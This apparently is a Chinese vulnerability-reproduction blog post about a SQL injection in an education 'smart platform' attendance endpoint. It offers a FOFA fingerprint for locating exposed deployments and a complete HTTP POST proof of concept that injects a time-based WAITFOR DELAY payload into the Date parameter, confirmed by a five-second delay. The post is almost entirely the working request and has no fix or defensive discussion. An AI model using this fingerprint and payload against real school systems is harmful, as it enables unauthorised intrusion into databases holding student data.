EDU 某智慧平台 PersonalDayInOutSchoolData SQL注入漏洞复现

OidBoy_G2024-09-23 1:33

FOFA:body="custom/blue/uimaker/easyui.css"

PoC

复制代码 
POST /ashx/APP/InOutSchoolService.ashx?action=PersonalDayInOutSchoolData&Date=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&AccountNo=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Connection: keep-alive

延时5秒

相关推荐
行思理3 小时前
linux 安全与防护,全方向讲解
linux·安全·github
深盾安全3 小时前
Flutter框架编译Android程序全攻略:从入门到进阶
安全
房屋安全鉴定检测4 小时前
房屋安全鉴定报告有效期多久
安全·网络安全
心 一4 小时前
Web安全基石:深入理解与防御SQL注入漏洞
sql·安全·web安全
房屋安全鉴定检测5 小时前
房屋安全鉴定需要什么条件
安全·网络安全
wanhengidc6 小时前
什么是云手机?
运维·网络·安全·游戏·智能手机
FLS1687 小时前
Kali搭建sqli-labs靶场
linux·sql·安全·网络安全
KKKlucifer8 小时前
网络安全等级保护:等级保护工作、分级保护工作、密码管理工作三者之间的关系
网络·安全·web安全
leagsoft_100310 小时前
联软科技:以“韧性安全”守护数字世界,致敬抗战胜利80周年的坚韧精神
科技·安全
普通网友10 小时前
支持二次开发的代练App源码:订单管理、代练监控、安全护航功能齐全,一站式解决代练护航平台源码(PHP+ Uni-app)
安全·uni-app·php
热门推荐
01UV安装并设置国内源022025 年高教社杯全国大学生数学建模竞赛C 题 NIPT 的时点选择与胎儿的异常判定 完整成品思路模型代码分享,全网首发高质量!!!032025年数学建模国赛C题超详细解题思路04A股预测还能更准?开源大模型Kronos带你跑通预测+回测全流程05不再让Windows更新!&Edge游戏助手卸载及关闭自动更新06KGG转MP3工具|非KGM文件|解密音频07UV 工具安装与国内镜像源配置指南08教你如何认证 Gemini 教育优惠的二次验证,薅个 1年的 Gemini Pro 会员092025全国大学生数学建模C题保姆级思路模型(持续更新):NIPT 的时点选择与胎儿的异常判定102025高教社杯国赛数学建模选题建议+初步分析